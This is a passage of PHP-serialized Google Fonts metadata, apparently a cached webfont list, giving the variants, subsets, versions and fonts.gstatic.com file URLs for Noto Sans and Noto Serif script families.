Y4XrbhLhnu4-tbNu.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4XZbhLhnu4-tbNu.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4U1aRLhnu4-tbNu.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4UMaRLhnu4-tbNu.ttf\";s:3:\"800\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VraRLhnu4-tbNu.ttf\";s:3:\"900\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VCaRLhnu4-tbNu.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:966;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Thai\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU5RspzF-QRvzzXg.ttf\";s:3:\"200\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUxRtpzF-QRvzzXg.ttf\";s:3:\"300\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU8ptpzF-QRvzzXg.ttf\";s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU5RtpzF-QRvzzXg.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU6ZtpzF-QRvzzXg.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU0pqpzF-QRvzzXg.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU3NqpzF-QRvzzXg.ttf\";s:3:\"800\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUxRqpzF-QRvzzXg.ttf\";s:3:\"900\";s:119:\"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUz1qpzF-QRvzzXg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:967;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Thai Looped\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:4:\"thai\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:102:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50fF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3YX6AYeCT_Wfd1.ttf\";s:3:\"200\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Y84E4UgrzUO5sKA.ttf\";s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yl4I4UgrzUO5sKA.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50RF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3gO6ocWiHvWQ.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yz4M4UgrzUO5sKA.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Y44Q4UgrzUO5sKA.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yh4U4UgrzUO5sKA.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Ym4Y4UgrzUO5sKA.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yv4c4UgrzUO5sKA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:968;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Tifinagh\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"tifinagh\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosanstifinagh/v15/I_uzMoCduATTei9eI8dawkHIwvmhCvbn6rnEcXfs4Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:969;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Tirhuta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"tirhuta\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanstirhuta/v15/t5t6IQYRNJ6TWjahPR6X-M-apUyby7uGUBsTrn5P.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:970;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Ugaritic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"ugaritic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansugaritic/v15/3qTwoiqhnSyU8TNFIdhZVCwbjCpkAXXkMhoIkiazfg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:971;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Sans Vai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:3:\"vai\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notosansvai/v15/NaPecZTSBuhTirw6IaFn_UrURMTsDIRSfr0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:972;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Wancho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"wancho\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanswancho/v15/zrf-0GXXyfn6Fs0lH9P4cUubP0GBqAPopiRfKp8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:973;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Warang Citi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:11:\"warang-citi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/notosanswarangciti/v15/EYqtmb9SzL1YtsZSScyKDXIeOv3w-zgsNvKRpeVCCXzdgA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:974;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans Yi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:2:\"yi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosansyi/v15/sJoD3LFXjsSdcnzn071rO3apxVDJNVgSNg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:975;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Noto Sans Zanabazar Square\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:16:\"zanabazar-square\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notosanszanabazarsquare/v15/Cn-jJsuGWQxOjaGwMQ6fOicyxLBEMRfDtkzl4uagQtJxOCEgN0Gc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:976;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Noto Serif\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/notoserif/v21/ga6Iaw1J5X9T9RW6j9bNTFAcaRi_bMQ.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/notoserif/v21/ga6Kaw1J5X9T9RW6j9bNfFIWbTq6fMRRMw.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/notoserif/v21/ga6Law1J5X9T9RW6j9bNdOwzTRCUcM1IKoY.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/notoserif/v21/ga6Vaw1J5X9T9RW6j9bNfFIu0RWedO9NOoYIDg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:977;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Serif Ahom\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:4:\"ahom\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notoserifahom/v17/FeVIS0hfp6cprmEUffAW_fUL_AN-wuYrPFiwaw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:978;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif Armenian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:8:\"armenian\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZi8ObxvXagGdkbg.ttf\";s:3:\"200\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZC8KbxvXagGdkbg.ttf\";s:3:\"300\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZ1cKbxvXagGdkbg.ttf\";s:7:\"regular\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZi8KbxvXagGdkbg.ttf\";s:3:\"500\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZucKbxvXagGdkbg.ttf\";s:3:\"600\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZVcWbxvXagGdkbg.ttf\";s:3:\"700\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZbMWbxvXagGdkbg.ttf\";s:3:\"800\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZC8WbxvXagGdkbg.ttf\";s:3:\"900\";s:131:\"http://fonts.gstatic.com/s/notoserifarmenian/v16/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZIsWbxvXagGdkbg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:979;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif Balinese\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"balinese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notoserifbalinese/v16/QdVKSS0-JginysQSRvuCmUMB_wVeQAxXRbgJdhapcUU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:980;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Bengali\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcAH3qn4LjQH8yD.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfeAHnqn4LjQH8yD.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfdeHnqn4LjQH8yD.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcAHnqn4LjQH8yD.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcyHnqn4LjQH8yD.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JffeGXqn4LjQH8yD.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JffnGXqn4LjQH8yD.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfeAGXqn4LjQH8yD.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfepGXqn4LjQH8yD.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:981;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Serif Devanagari\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTA-og-HMUe1u_dv.ttf\";s:3:\"200\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTC-ow-HMUe1u_dv.ttf\";s:3:\"300\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTBgow-HMUe1u_dv.ttf\";s:7:\"regular\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTA-ow-HMUe1u_dv.ttf\";s:3:\"500\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTAMow-HMUe1u_dv.ttf\";s:3:\"600\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTDgpA-HMUe1u_dv.ttf\";s:3:\"700\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTDZpA-HMUe1u_dv.ttf\";s:3:\"800\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTC-pA-HMUe1u_dv.ttf\";s:3:\"900\";s:135:\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTCXpA-HMUe1u_dv.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:982;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Display\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpd49gKaDU9hvzC.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVrd4tgKaDU9hvzC.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVoD4tgKaDU9hvzC.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpd4tgKaDU9hvzC.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpv4tgKaDU9hvzC.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVqD5dgKaDU9hvzC.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVq65dgKaDU9hvzC.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVrd5dgKaDU9hvzC.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVr05dgKaDU9hvzC.ttf\";s:9:\"100italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoTBIYjEfg-zCmf4.ttf\";s:9:\"200italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VobBJYjEfg-zCmf4.ttf\";s:9:\"300italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoW5JYjEfg-zCmf4.ttf\";s:6:\"italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoTBJYjEfg-zCmf4.ttf\";s:9:\"500italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoQJJYjEfg-zCmf4.ttf\";s:9:\"600italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-Voe5OYjEfg-zCmf4.ttf\";s:9:\"700italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoddOYjEfg-zCmf4.ttf\";s:9:\"800italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VobBOYjEfg-zCmf4.ttf\";s:9:\"900italic\";s:131:\"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoZlOYjEfg-zCmf4.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:983;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Serif Dogra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"dogra\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notoserifdogra/v15/MQpP-XquKMC7ROPP3QOOlm7xPu3fGy63IbPzkns.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:984;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif 